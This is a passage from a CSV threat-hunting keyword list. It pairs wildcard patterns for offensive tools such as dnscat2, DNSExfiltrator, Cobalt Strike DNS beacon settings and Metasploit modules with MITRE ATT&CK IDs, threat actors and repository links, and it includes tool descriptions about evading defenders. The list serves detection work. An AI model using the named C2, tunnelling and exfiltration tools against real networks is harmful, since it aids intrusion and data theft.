T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_maxdns*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_ns_response*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 
- T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_put_metadata*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 
Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_beacon_put_output*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*dns_bruteforce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*dns_redir.sh *","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*dns_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - 
T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*dns_stager_prepend*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*'dns_stager_prepend'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*dns_stager_subhost*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*'dns_stager_subhost'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*dnsadmin_serverlevelplugindll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*DNSAES256Handler.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*dns-beacon *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*DNS-C2 #>*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*dnscan-master*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*dnscat -*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat tcpcat*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - 
TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat*","offensive_tool_keyword","dnscat","Welcome to dnscat2. a DNS tunnel that WON'T make you sick and kill you This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. which is an effective tunnel out of almost every network.","T1071 - T1090 - T1571","TA0011","N/A","N/A","Data Exfiltration","https://github.com/iagox86/dnscat2","1","0","N/A","N/A","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat2*.tar.bz2*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat2-*.zip*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat2.*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat2.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - 
TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*dnscat2/*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat2-server*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnscat2-win32.exe*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnschef --fakeip 127.0.0.1 -q*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dnscmd . 
/enumrecords /zone *","greyware_tool_keyword","dnscmd","the actor gather information about the target environment","T1018 - T1049","TA0007 - TA0009","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*dnscmd . /enumzones*","greyware_tool_keyword","dnscmd","the actor gather information about the target environment","T1018 - T1049","TA0007 - TA0009","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*dnsenum*","offensive_tool_keyword","dnsenum","multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.","T1218 - T1018 - T1190 - T1590 - T1012","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/fwaeytens/dnsenum","1","1","N/A","N/A","6","521","133","2019-10-08T19:58:40Z","2014-01-10T14:47:09Z" +"*DNS-Enum-*-*.log*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*dnsexfiltrator.*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" +"*DNSExfiltratorLib*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" +"*DNSListener.py*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*dnslytics-get-rootdomains*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*dnsmastermind.rb*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*dnsmorph*","offensive_tool_keyword","dnsmorph","DNSMORPH is a domain name permutation engine. inspired by dnstwist. It is written in Go making for a compact and very fast tool. 
It robustly handles any domain or subdomain supplied and provides a number of configuration options to tune permutation runs.","T1568.002 - T1568.003 - T1568.001 - T1568.004","TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/netevert/dnsmorph","1","1","N/A","N/A","3","241","41","2023-08-08T06:38:59Z","2018-02-20T19:13:35Z" +"*dnspayload.bin*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 